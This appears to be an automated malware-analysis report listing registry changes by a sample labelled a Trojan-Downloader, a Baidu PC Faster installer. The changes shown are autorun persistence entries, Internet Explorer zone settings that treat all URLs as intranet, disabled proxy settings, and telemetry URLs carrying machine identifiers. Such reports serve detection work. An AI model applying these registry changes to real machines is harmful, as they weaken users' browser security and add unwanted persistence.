[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 47 DF 08 43 B1 8C D4 15 3E 3E 91 04 CD 88 7A"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Temp]
"(Default)"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\LogReporter\DEBUG]
"Trace Level"
The process LogReporter.exe:2160 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 A9 17 AA 84 CD 52 24 1B 32 8C 4B D6 59 4D 6B"
The process Updater.exe:2444 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 0D B8 B6 0B FE 9A 82 71 EF BF 4D 38 08 0A EF"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Updater\DEBUG]
"Trace Level" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Temp\%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData]
"rpFile-Updater-2014-12-20 12-35-17-0201-[17113].tmp" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/get_pcf_statistic_info.cgi"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Updater\DEBUG]
"Trace Level"
The process sc.exe:964 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 36 27 51 35 4F 35 11 1B 9A 16 49 91 A5 FB 2A"
The process sc.exe:1524 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 D2 A5 EC C0 F2 20 58 AE E6 80 B7 75 18 08 32"
The process sc.exe:676 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 B8 B4 6B 7A DA BC 42 E8 69 B9 7D B7 67 58 74"
The process sc.exe:1704 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 0E BC 0D BE 07 8A 47 B5 EF D8 C6 EF 16 56 E3"
The process sc.exe:1660 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 44 85 2B E2 95 69 C7 D4 77 56 40 A2 FD 5B C7"
The process Baidu_Secure_SystemUp_5.0.4.87531.exe:1692 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"DisplayVersion" = "5.0.4.87531"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Baidu Security\PC Faster\Setup]
"SetupResult" = "0"
[HKCU\Software\Baidu Security\PC Faster]
"InstallTime" = "2014-12-20 10:33:18"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData]
"rpFile-Baidu_Secure_SystemUp_5.0.4.87531-2014-12-20 12-34-14-0404-[8244].dat" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/get_pcf_statistic_info.cgi"
[HKLM\System\CurrentControlSet\Services\PCFasterSvc_{PCFaster_4.0.0.0}]
"Group" = "COM Infrastructure"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"UninstallString" = "%Program Files%\Baidu Security\PC Faster\5.0.0.0\Uninstall.exe"
"InstallDir" = "%Program Files%\Baidu Security\PC Faster\5.0.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Baidu Security\PC Faster]
"InstallChannel" = "DirectAgents|br|IBD|Banner"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Baidu Security\PC Faster]
"pcfaster-id" = "S-1-5-21-1844237615-1960408961-1801674531-1003#000C296817BB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\PCFasterSvc_{PCFaster_4.0.0.0}]
"Description" = "Baidu PC Faster Service 4.0.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Baidu Security\PC Faster]
"IsEverInstalled" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsmC0.tmp\BHips.dll,"
[HKCU\Software\Baidu Security\PC Faster\4.0.0.0\Install\2043328]
"URL" = "http://sync.security.baidu.co.th/cgi-bin-py/get_channel_info.cgi?install_channel=DirectAgents|br|IBD|Banner&version=5.0.4.87531&errorcode=0&errortext=&userid=e939675892611217d37e7da12c55d037&old_userid=00000000-000C296817BB!00cc44a8-0bfd-4d1a-8e7a-474529635d9e@#000C296817BB&install_time=2014-12-20 10:33:18&install_time_num=1419064398&cost_time=38&file_created_time=2014-12-20 10:32:59"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"DisplayIcon" = "%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFaster.exe"
[HKLM\SOFTWARE\Baidu Security]
"uuid" = "S-1-5-21-1844237615-1960408961-1801674531-1003#000C296817BB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"InstallChannel" = "DirectAgents|br|IBD|Banner"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"schtasks.exe" = "Schedule Tasks"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"Beta" = "0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsmC0.tmp]
"LogReporter.exe" = "Log Reporter"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Baidu Security\PC Faster]
"CurrentInstallVersion" = "4.0.0.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 AA 32 13 A6 94 99 E0 14 26 58 79 8E 58 30 5C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Baidu_Secure_SystemUp_5.0.4.87531\DEBUG]
"Trace Level" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"Publisher" = "Baidu, Inc."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Baidu Security\PC Faster]
"StopSvc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"URLInfoAbout" = "http://www.pcfaster.com/go.php?link=1&pos=about"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"InstallTime" = "2014-12-20 10:33:18"
[HKCU\Software\Baidu Security\PC Faster\4.0.0.0\Install\2042015]
"URL" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/get_channel_info.cgi?install_channel=DirectAgents|br|IBD|Banner&version=5.0.4.87531&errorcode=0&errortext=&userid=e939675892611217d37e7da12c55d037&old_userid=00000000-000C296817BB!00cc44a8-0bfd-4d1a-8e7a-474529635d9e@#000C296817BB&install_time=2014-12-20 10:33:18&install_time_num=1419064398&cost_time=38&file_created_time=2014-12-20 10:32:59"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0]
"DisplayName" = "Baidu PC Faster"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Baidu PC Faster 4.0.0.0" = "%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFTray.exe -auto -start"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Baidu_Secure_SystemUp_5.0.4.87531\DEBUG]
"Trace Level"
[HKLM\SOFTWARE\Baidu Security\PC Faster]
"StopSvc"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Temp\%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData]
"rpFile-Baidu_Secure_SystemUp_5.0.4.87531-2014-12-20 12-34-14-0404-[8244].tmp"
The Trojan-Downloader disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BSECURE"
"BaiduPCFasterSetup"
"Baidu PC Faster 4.0.0.0"
The process PC_Faster_Setup_Mini_B104_144327560.exe:1284 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-51-0904-[7349].dat" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/mini_install_statistic_info.cgi"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PC_Faster_Setup_Mini_B104_144327560\DEBUG]
"Trace Level" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Baidu Security\PC Faster]
"pcfaster-id" = "S-1-5-21-1844237615-1960408961-1801674531-1003#000C296817BB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0170-[7431].dat" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/mini_install_statistic_info.cgi"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-59-0013-[7375].dat" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/mini_install_statistic_info.cgi"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PCFMiniService]
"MiniService.exe" = "Mini Service"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Temp\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].tmp" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/mini_install_statistic_info.cgi"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\PCFMini]
"mini_path" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\PC_Faster_Setup_Mini_B104_144327560.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 11 94 DA 90 2D 8A D8 8C 49 04 C8 B8 55 2D 12"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\PCFMini]
"mini_command_line" = "/S"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0154-[7431].dat" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/mini_install_statistic_info.cgi"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Baidu Security\PC Faster]
"pcfaster-guid" = "00cc44a8-0bfd-4d1a-8e7a-474529635d9e"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].dat" = "http://sync.pcfaster.baidu.com.eg/cgi-bin-py/mini_install_statistic_info.cgi"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following registry key(s):
[HKLM\SOFTWARE\PCFMini]
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Temp\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].tmp"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-51-0904-[7349].dat"
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-32-59-0013-[7375].dat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData]
"rpFile-Baidu_Secure_SystemUp_5.0.4.87531-2014-12-20 12-34-14-0404-[8244].dat"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0170-[7431].dat"
